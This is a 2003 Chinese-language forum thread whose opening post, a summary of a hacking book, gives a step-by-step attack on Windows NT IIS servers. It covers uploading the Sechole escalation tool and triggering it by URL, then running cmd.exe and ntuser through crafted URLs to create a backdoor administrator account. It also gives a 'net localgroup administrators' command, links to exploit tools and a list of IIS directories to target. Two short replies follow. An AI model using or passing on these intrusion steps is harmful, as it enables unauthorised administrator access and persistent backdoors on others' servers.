史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > 網路軟硬體架設技術文件
忘記密碼?
論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2003-11-23, 04:01 AM   #1
1211
榮譽勳章

勳章總數
UID -
在線等級:
文章: n/a
精華:
Thumbs up 美國超級駭客 還在用木馬等魚兒上勾,然後用prot掃瞄,或偷窺icp漏洞,或是猜密碼,或放或寄病毒網頁等人打開來

還在用木馬等魚兒上勾,然後用prot掃瞄,或偷窺icp漏洞,或是猜密碼,或放或寄病毒網頁
等人打開來這些初等或中等的攻擊法嗎??美國駭客的實力真是另人無法想像,

他們只需利用網址就能輕而意舉的主動攻擊了,情結不輸給電影,我們的手法

對他們而言只是無須大驚小怪的小兒科......參考書為黑紅色的網路駭客與系統安全

(好像有新版的,小皇是舊版的,名稱與外關差不多)

書籍上的重點,作者是美國著名的網路安全專家,


遠端緩衝區溢滿{buffer overflow}
緩衝區溢滿是發生在程式沒有適當的檢查輸入內容的長度
,而導致緩衝區空間不足,因此,任何預期之外的輸入,就會
掩蓋掉CPU執行堆疊的其它部分.
遠端執行命令取得系統管理者權限
http://www.infowar.co.uk/mnemonix
遠端執行一個批次檔執行任意的程式
http://www.infowar.co.uk/mnemonix/Ntbufferoverruns.htm


ISSHACK http://www.eeye.com
在NT ISS網頁伺服器上執行程式碼
在本機中可以給使一位使用者加入到區域的管理者群組中的擴權程式

http://www.ntsecurity.net/security/getadmin.htm
有相似功能的其它程式 sechole升級版是secholed
http://www.ntsecurity.net/security/sechole.htm
(Domain Admin group) 網域管理者(升級)群組


cmd.exe NT命令解釋器
ntuser 程式 用來修改使用者,群組和政策的程式,可參考
http://www.pedestalsoftware.com

Sechole的啟動可靠在一個瀏覽器輸入一個適當的URL連網目標系統,例如下列

我們將Sechole上傳至/W3SVC/1/ROOT/SCRIPTS
(這裡就是C:\inetpub\SCRIPTS)
然後用下面的URL網址啟動它
http://192.168.202.154/scripts/secholle.exe
這樣做會成功的將IUSR_machine_name帳號加入管理者群組中,我們並沒有

IUSR的密碼,因此我們為了要避免登入IUSR,通常是在目標系統上開個帳號,

做法是利用ntuser公用程式透過瀏覽器執行下列複雜的URL(為了方便閱讀內容經過裝飾)

http://192.168.202.154/scripts/cmd.e...sword%20secret

以上%20再網語中是空白的意思,所以以上網址會被執行為
(cmd /c 會送出ntuser命令到shell,在完成時終結自己)
cmd /c ntuser -s <servername> add <username> -password
<password>
以上我們是以corpl做伺服機名稱,mallory是使用者名稱,secret當密碼,

用類似的URL攻擊者可以用ntuser幫你把mallory加到管理者群組裡,如下
(LORGUP是指某個區域群組)
cmd /c ntuser -s <servername> LORGUP APPEND
<groupname> <username>...
http://192.168.202.154/scripts/cmd.e...tors%20mallory

同機能的批次檔寫法如registry,cmd
內容: net localgroup administrators <USER> /add

安全系統ISS目錄和一些潛在可行的目錄
http://www.iss.net/xforce/alerts/advise6.html
以下/W3SVC/1/ROOT通常是指C:\Inetpub\還有News及Mail
/W3SVC/1/ROOT/msade
/W3SVC/1/ROOT/cgi-bin
/W3SVC/1/ROOT/SCRIPTS
/W3SVC/1/ROOT/ISSADMPWD
/W3SVC/1/ROOT/_vti_bin
/W3SVC/1/ROOT/_vti_bin/_vti_adm
/W3SVC/1/ROOT/_vti_bin/_vti_aut
(_vti_bin都是安裝Front Page之後衍生出來的)
 
送花文章: 0, 收花文章: 0 篇, 收花: 0 次
向 送花的會員:
llliu60 (2013-02-01)
感謝您發表一篇好文章
舊 2003-11-23, 05:17 PM   #2 (permalink)
註冊會員
榮譽勳章

勳章總數
UID - 46835
在線等級: 級別:0 | 在線時長:0小時 | 升級還需:5小時
註冊日期: 2003-03-10
VIP期限: 2005-12
文章: 264
精華: 0
現金: 5000 金幣
資產: 5000 金幣
預設

sorry...程度太低...看不懂...

不過....真是不錯的文章...推啦
hwj_c 目前離線  
送花文章: 0, 收花文章: 0 篇, 收花: 0 次
舊 2003-11-24, 12:57 PM   #3 (permalink)
管理版主
 
mini 的頭像
榮譽勳章
UID - 4144
在線等級: 級別:91 | 在線時長:8765小時 | 升級還需:67小時級別:91 | 在線時長:8765小時 | 升級還需:67小時級別:91 | 在線時長:8765小時 | 升級還需:67小時級別:91 | 在線時長:8765小時 | 升級還需:67小時級別:91 | 在線時長:8765小時 | 升級還需:67小時級別:91 | 在線時長:8765小時 | 升級還需:67小時
註冊日期: 2002-12-07
文章: 12751
精華: 0
現金: 24897 金幣
資產: 3022557 金幣
預設

只聽過 衝區溢滿 是hack 常用的漏洞
其他也搞不懂
好像將 OS 裝在 C: 之外的分割區多少可避免一些不素之客
mini 目前離線  
送花文章: 1862, 收花文章: 7769 篇, 收花: 26363 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 12:07 AM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2020, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1